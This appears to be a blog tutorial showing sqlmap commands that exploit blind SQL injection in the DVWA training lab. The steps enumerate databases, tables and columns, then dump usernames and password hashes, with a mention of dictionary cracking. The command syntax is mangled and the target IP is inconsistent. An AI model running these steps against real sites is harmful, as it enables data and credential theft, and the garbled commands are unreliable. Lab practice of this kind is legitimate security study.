Menu Close

SQL MAP

What is SQLMAP?

The sqlmap is an SQL injection tool developed in Python, your goal is to detect and exploit SQL injection vulnerabilities in applications or Web sites, as it detects one or more SQL injections on a target, the user can choose from a variety SQLMAP provides options to explore data stored within the database of this system or site, such as extracting the list of users, passwords, privileges, tables, and more.
Let’s insert the get get into sqlmap and analyze the process. The variable to check is id. If the SQL injection vulnerability is found in this variable, sqlmap will be able to view the parameter the database uses to select data and also view databases.


sqlmap –cookie = “PHPSESSID = lrn5egdl79ee0hjqtn0g33p4v5; security = low” -u ” http://192.168.189.246/DVWA/vulnerabilities/sqli_blind/?id=5&Submit=Submit ” -p id
Let’s add the –dbs parameter we can see the name of the database.

sqlmap –cookie = “PHPSESSID = lrn5egdl79ee0hjqtn0g33p4v5; security = low” -u ” http://192.168.56.102/DVWA/vulnerabilities/sqli_blind/?id=2&Submit=Submit ” -p id –dbs

Let’s add the -D parameter by selecting the found base and then – tables we can see the tables.

sqlmap –cookie = “PHPSESSID = lrn5egdl79ee0hjqtn0g33p4v5; security = low” -u ” http://192.168.56.102/DVWA/vulnerabilities/sqli_blind/?id=2&Submit=Submit ” -p id -D dvwa –tables

Let’s add the -T users – columns parameter to see each field in the user table.

sqlmap –cookie = “PHPSESSID = lrn5egdl79ee0hjqtn0g33p4v5; security = low” -u ” http://192.168.56.102/DVWA/vulnerabilities/sqli_blind/?id=2&Submit=Submit ” -p id -D dvwa -T users –columns

Let’s add the parameter -C user, password – dump so we can give a full DUMP of the database. SQLMAP still gives you the option to create a file with dump hashes, yet use a dictionary-based attack to crack passwords.

sqlmap –cookie = “PHPSESSID = lrn5egdl79ee0hjqtn0g33p4v5; security = low” -u ” http://192.168.56.102/DVWA/vulnerabilities/sqli_blind/?id=2&Submit=Submit ” -p id -D dvwa -T users -C user , password –dump

%d bloggers like this: